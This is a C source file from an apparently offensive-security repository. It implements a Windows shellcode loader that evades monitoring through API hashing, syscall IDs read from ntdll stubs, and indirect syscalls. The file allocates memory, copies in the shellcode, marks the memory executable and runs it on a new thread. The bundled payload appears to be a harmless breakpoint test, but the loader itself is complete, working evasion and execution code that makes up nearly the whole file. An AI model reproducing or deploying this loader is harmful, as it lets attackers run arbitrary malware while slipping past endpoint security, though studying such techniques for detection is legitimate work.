mirror of
https://github.com/srothlisberger6361/ShellCodeLoader_Indirect_Syscalls
synced 2026-06-06 16:44:34 +00:00
261 lines
10 KiB
C
261 lines
10 KiB
C
#include <Windows.h>
|
|
|
|
|
|
#include "ShellCodeLoader.h"
|
|
#include "WinApiReImplementations.h"
|
|
#include "shellcode.h"
|
|
|
|
#pragma comment(linker, "/section:.data,RW")//.data section writable
|
|
//#pragma comment(linker, "/section:.data,RWE")//.data section executable
|
|
|
|
/*
|
|
* Define the functisons from Syscalls.asm.
|
|
* These definitions make the PrepareSyscall and DoIndirectSyscall functions accessible to ShellcodeLoader.c.
|
|
*/
|
|
|
|
// we pass a DWORD instead of a word (some syscall IDs are 3 Bytes long)
|
|
//extern VOID PrepareSyscall(WORD wSystemCall);
|
|
extern VOID PrepareSyscall(DWORD wSystemCall, LPVOID pSystemCall);
|
|
// to use this without implicit return type, we need to convert from c++ to c
|
|
// not sure whether passing an implicit return type would actually work here, as differenct syscalls
|
|
// may return different return types (?)
|
|
extern DoIndirectSyscall();
|
|
|
|
/*
|
|
* Locate syscall information within ntdll
|
|
* arg0: base address of ntdll
|
|
* arg1: function name to resolve (e.g. NtCreateProcess) -> to be replaced by hash
|
|
* arg2: pointer to void*. This will be populated with the address of the syscall instruction for that function
|
|
* arg3: pointer to DWORD. This will be populated with the Syscall ID
|
|
* return: -1 / ERROR_SUCCESS.
|
|
*/
|
|
//NTSTATUS resolve_syscall(HMODULE hNtDll, LPCSTR funcName, _Out_ LPVOID *outpSyscall, _Out_ LPDWORD outSyscallId) {
|
|
NTSTATUS resolve_syscall(HMODULE hNtDll, DWORD function_hash, _Out_ LPVOID *outpSyscall, _Out_ LPDWORD outSyscallId) {
|
|
// tbd: Avoid GPA and use API hashes.
|
|
// See https://www.ired.team/offensive-security/defense-evasion/windows-api-hashing-in-malware for a copy-paste ready implementation of GPA
|
|
//LPVOID pProc = (LPVOID)GetProcAddress(hNtDll, funcName);
|
|
LPVOID pProc = GetProcAddressByHash(hNtDll, function_hash);
|
|
if (pProc == NULL) {
|
|
DEBUG_PRINT("GetProcAddressByHash failed for 0x%x\n", function_hash);
|
|
return (NTSTATUS) -1;
|
|
}
|
|
|
|
|
|
DEBUG_PRINT("Function for hash 0x%x at %p\n", function_hash, pProc);
|
|
/*
|
|
0:000> uf ntdll!NtCreateProcess
|
|
ntdll!NtCreateProcess:
|
|
00007ffc`b3e10b10 4c8bd1 mov r10,rcx
|
|
00007ffc`b3e10b13 b8be000000 mov eax,0BEh
|
|
00007ffc`b3e10b18 f604250803fe7f01 test byte ptr [SharedUserData+0x308 (00000000`7ffe0308)],1
|
|
00007ffc`b3e10b20 7503 jne ntdll!NtCreateProcess+0x15 (00007ffc`b3e10b25) Branch
|
|
|
|
ntdll!NtCreateProcess+0x12:
|
|
00007ffc`b3e10b22 0f05 syscall
|
|
00007ffc`b3e10b24 c3 ret
|
|
*/
|
|
|
|
DWORD syscallId = 0;
|
|
PBYTE ptr = (PBYTE)pProc;
|
|
while (TRUE) {
|
|
// 0xb8 => mov eax, ...
|
|
if (*ptr == 0xb8) {
|
|
syscallId = *(DWORD*)(ptr + 1);
|
|
}
|
|
// 0x0f05 => syscall
|
|
else if (*ptr == 0x0f) {
|
|
if (*(ptr + 1) == 0x05) {
|
|
// 0xc3 => ret
|
|
if (*(ptr + 2) == 0xc3) {
|
|
DEBUG_PRINT("Syscall for 0x%x at %p. ID: %02x\n", function_hash, ptr, syscallId);
|
|
*outSyscallId = syscallId;
|
|
*outpSyscall = ptr;
|
|
return ERROR_SUCCESS;
|
|
}
|
|
}
|
|
}
|
|
|
|
// prevent an endless loop
|
|
if ((ptr - (PBYTE)pProc) == 50) {
|
|
DEBUG_PRINT("Could not identify Syscall for 0x%x\n", function_hash);
|
|
return (NTSTATUS)-1;
|
|
}
|
|
ptr++;
|
|
}
|
|
}
|
|
|
|
/*
|
|
* populate the SYSCALL_INFO_TABLE by resolving the individual syscall information
|
|
* If you'd like to add more syscalls, change the SYSCALL_INFO_TABLE struct within ShellCodeLoader.h and add calls to resolve_syscall as below
|
|
* arg0: Base address of ntdll
|
|
* arg1: Pointer to SYSCALL_INFO_TABLE struct - This is populated with the actual syscall information
|
|
* return: ERROR_SUCCESS (success) or -1 (failure)
|
|
*/
|
|
|
|
NTSTATUS populate_syscall_table(HMODULE hNtDll, _Out_ PSYSCALL_INFO_TABLE pSyscallTable) {
|
|
//LPCSTR funcName = "NtAllocateVirtualMemory";
|
|
NTSTATUS status = (NTSTATUS)-1;
|
|
//status = resolve_syscall(hNtDll, funcName, &pSyscallTable->NtAllocateVirtualMemory.pSyscall, &pSyscallTable->NtAllocateVirtualMemory.syscallId);
|
|
status = resolve_syscall(hNtDll, pSyscallTable->NtAllocateVirtualMemory.functionHash, &pSyscallTable->NtAllocateVirtualMemory.pSyscall, &pSyscallTable->NtAllocateVirtualMemory.syscallId);
|
|
if (status != ERROR_SUCCESS) {
|
|
DEBUG_PRINT("Failed to resolve Syscall for 0x%x!", pSyscallTable->NtAllocateVirtualMemory.functionHash);
|
|
return (NTSTATUS)-1;
|
|
}
|
|
|
|
//funcName = "NtProtectVirtualMemory";
|
|
//status = resolve_syscall(hNtDll, funcName, &pSyscallTable->NtProtectVirtualMemory.pSyscall, &pSyscallTable->NtProtectVirtualMemory.syscallId);
|
|
status = resolve_syscall(hNtDll, pSyscallTable->NtProtectVirtualMemory.functionHash, &pSyscallTable->NtProtectVirtualMemory.pSyscall, &pSyscallTable->NtProtectVirtualMemory.syscallId);
|
|
if (status != ERROR_SUCCESS) {
|
|
DEBUG_PRINT("Failed to resolve Syscall for 0x%x!", pSyscallTable->NtProtectVirtualMemory.functionHash);
|
|
return (NTSTATUS)-1;
|
|
}
|
|
|
|
//funcName = "NtCreateThreadEx";
|
|
//status = resolve_syscall(hNtDll, funcName, &pSyscallTable->NtCreateThreadEx.pSyscall, &pSyscallTable->NtCreateThreadEx.syscallId);
|
|
status = resolve_syscall(hNtDll, pSyscallTable->NtCreateThreadEx.functionHash, &pSyscallTable->NtCreateThreadEx.pSyscall, &pSyscallTable->NtCreateThreadEx.syscallId);
|
|
if (status != ERROR_SUCCESS) {
|
|
DEBUG_PRINT("Failed to resolve Syscall for 0x%x!", pSyscallTable->NtCreateThreadEx.functionHash);
|
|
return (NTSTATUS)-1;
|
|
}
|
|
|
|
//funcName = "NtWaitForSingleObject";
|
|
//status = resolve_syscall(hNtDll, funcName, &pSyscallTable->NtWaitForSingleObject.pSyscall, &pSyscallTable->NtWaitForSingleObject.syscallId);
|
|
status = resolve_syscall(hNtDll, pSyscallTable->NtWaitForSingleObject.functionHash, &pSyscallTable->NtWaitForSingleObject.pSyscall, &pSyscallTable->NtWaitForSingleObject.syscallId);
|
|
if (status != ERROR_SUCCESS) {
|
|
DEBUG_PRINT("Failed to resolve Syscall for 0x%x!", pSyscallTable->NtWaitForSingleObject.functionHash);
|
|
return (NTSTATUS)-1;
|
|
}
|
|
|
|
return ERROR_SUCCESS;
|
|
|
|
}
|
|
|
|
/*
|
|
* Execute shellcode using indirect syscalls (copied from https://github.com/am0nsec/HellsGate/blob/master/HellsGate/main.c#L166)
|
|
* arg0: pointer to syscall table. The syscallId and pSyscall members are used in PrepareSyscall
|
|
* arg1: shellcode
|
|
* return: ERROR_SUCCESS (success) / -1 (failure)
|
|
* Call stack:
|
|
* * NtAllocateVirutalMemory
|
|
* * memcpy (basically)
|
|
* * NtProtectVirtualMemory
|
|
* * NtCreateThreadEx
|
|
* * NtWaitForSingleObject
|
|
*/
|
|
NTSTATUS execute_shellcode_create_thread(PSYSCALL_INFO_TABLE pSyscallTable, const CHAR shellcode[], size_t shellcode_len) {
|
|
NTSTATUS status = 0x00000000;
|
|
DEBUG_PRINT("Executing shellcode\n");
|
|
|
|
// Allocate memory for the shellcode
|
|
PVOID lpAddress = NULL;
|
|
SIZE_T sDataSize = shellcode_len;
|
|
PrepareSyscall(pSyscallTable->NtAllocateVirtualMemory.syscallId, pSyscallTable->NtAllocateVirtualMemory.pSyscall);
|
|
status = DoIndirectSyscall((HANDLE)-1, &lpAddress, 0, &sDataSize, MEM_COMMIT, PAGE_READWRITE);
|
|
|
|
if (status != ERROR_SUCCESS) {
|
|
DEBUG_PRINT("NtAllocateVirtualMemory failed!");
|
|
return (NTSTATUS)-1;
|
|
}
|
|
|
|
DEBUG_PRINT("Allocated memory at %p\n", lpAddress);
|
|
|
|
// Write shellcodde
|
|
MoveMemoryReImpl(lpAddress, (const PVOID)shellcode, shellcode_len);
|
|
|
|
// make page executable
|
|
ULONG ulOldProtect = 0;
|
|
PrepareSyscall(pSyscallTable->NtProtectVirtualMemory.syscallId, pSyscallTable->NtProtectVirtualMemory.pSyscall);
|
|
status = DoIndirectSyscall((HANDLE)-1, &lpAddress, &sDataSize, PAGE_EXECUTE_READ, &ulOldProtect);
|
|
|
|
if (status != ERROR_SUCCESS) {
|
|
DEBUG_PRINT("NtProtectVrirtualMemory failed!");
|
|
return (NTSTATUS)-1;
|
|
}
|
|
|
|
DEBUG_PRINT("NtProtectVrirtualMemory success!\n");
|
|
|
|
// Create thread
|
|
HANDLE hHostThread = INVALID_HANDLE_VALUE;
|
|
PrepareSyscall(pSyscallTable->NtCreateThreadEx.syscallId, pSyscallTable->NtCreateThreadEx.pSyscall);
|
|
status = DoIndirectSyscall(&hHostThread, 0x1FFFFF, NULL, (HANDLE)-1, (LPTHREAD_START_ROUTINE)lpAddress, NULL, FALSE, NULL, NULL, NULL, NULL);
|
|
|
|
if ( (status != ERROR_SUCCESS) || (hHostThread == INVALID_HANDLE_VALUE) ) {
|
|
DEBUG_PRINT("NtCreateThreadEx failed!");
|
|
return (NTSTATUS)-1;
|
|
}
|
|
|
|
DEBUG_PRINT("NtCreateThreadEx success. hThread: %p\n", hHostThread);
|
|
|
|
// Wait for 1 second & execute
|
|
LARGE_INTEGER Timeout;
|
|
Timeout.QuadPart = -10000000;
|
|
PrepareSyscall(pSyscallTable->NtWaitForSingleObject.syscallId, pSyscallTable->NtWaitForSingleObject.pSyscall);
|
|
status = DoIndirectSyscall(hHostThread, FALSE, &Timeout);
|
|
|
|
if (status != ERROR_SUCCESS) {
|
|
DEBUG_PRINT("NtWaitForSingleObject Failed!");
|
|
return (NTSTATUS)-1;
|
|
}
|
|
|
|
DEBUG_PRINT("NtWaitForSingleObject success.\n");
|
|
|
|
return ERROR_SUCCESS;
|
|
}
|
|
|
|
// Entrypoint
|
|
int main()
|
|
{
|
|
/*
|
|
// GMH not needed any longer
|
|
HMODULE hNtDll = GetModuleHandle(L"ntdll.dll");
|
|
*/
|
|
HMODULE hNtDll = GetModuleHandleByHash(0x22d3b5ed);
|
|
if (hNtDll == NULL) {
|
|
DEBUG_PRINT("GetModuleHandle failed for ntdll!\n");
|
|
return -1;
|
|
}
|
|
|
|
DEBUG_PRINT("NtDll mapped to %p\n", hNtDll);
|
|
|
|
/*
|
|
* Just a test to make sure it works for other modules as well
|
|
HMODULE hKernel32 = GetModuleHandle(L"kernel32.dll");
|
|
HMODULE hKernel322 = GetModuleHandleByHash(0x6ddb9555);
|
|
DEBUG_PRINT("kernel32: %p / %p\n", hKernel32, hKernel322);
|
|
*/
|
|
|
|
DEBUG_PRINT("sizeof shellcode: %d\n", (int)sizeof(shellcode_int3));
|
|
|
|
/*
|
|
* C:\Users\joshua\Desktop\ShellCodeLoader_Indirect_Syscalls>"C:\Program Files\Python311\python.exe" create_api_hashes.py
|
|
* string: ntdll.dll, hash: 0x22d3b5ed
|
|
* string: NtAllocateVirtualMemory, hash: 0x6793c34c
|
|
* string: NtProtectVirtualMemory, hash: 0x82962c8
|
|
* string: NtCreateThreadEx, hash: 0xcb0c2130
|
|
* string: NtWaitForSingleObject, hash: 0x4c6dc63c
|
|
*/
|
|
SYSCALL_INFO_TABLE syscalls = { 0 };
|
|
syscalls.NtAllocateVirtualMemory.functionHash = 0x6793c34c;
|
|
syscalls.NtProtectVirtualMemory.functionHash = 0x82962c8;
|
|
syscalls.NtCreateThreadEx.functionHash = 0xcb0c2130;
|
|
syscalls.NtWaitForSingleObject.functionHash = 0x4c6dc63c;
|
|
|
|
NTSTATUS status = populate_syscall_table(hNtDll, &syscalls);
|
|
|
|
if (status != ERROR_SUCCESS) {
|
|
DEBUG_PRINT("Error populating Syscall table!\n");
|
|
return -1;
|
|
}
|
|
|
|
status = execute_shellcode_create_thread(&syscalls, shellcode_int3, sizeof(shellcode_int3));
|
|
|
|
if (status != ERROR_SUCCESS) {
|
|
DEBUG_PRINT("Error executing shellcode!\n");
|
|
return -1;
|
|
}
|
|
|
|
DEBUG_PRINT("YAY");
|
|
return ERROR_SUCCESS;
|
|
}
|
|
|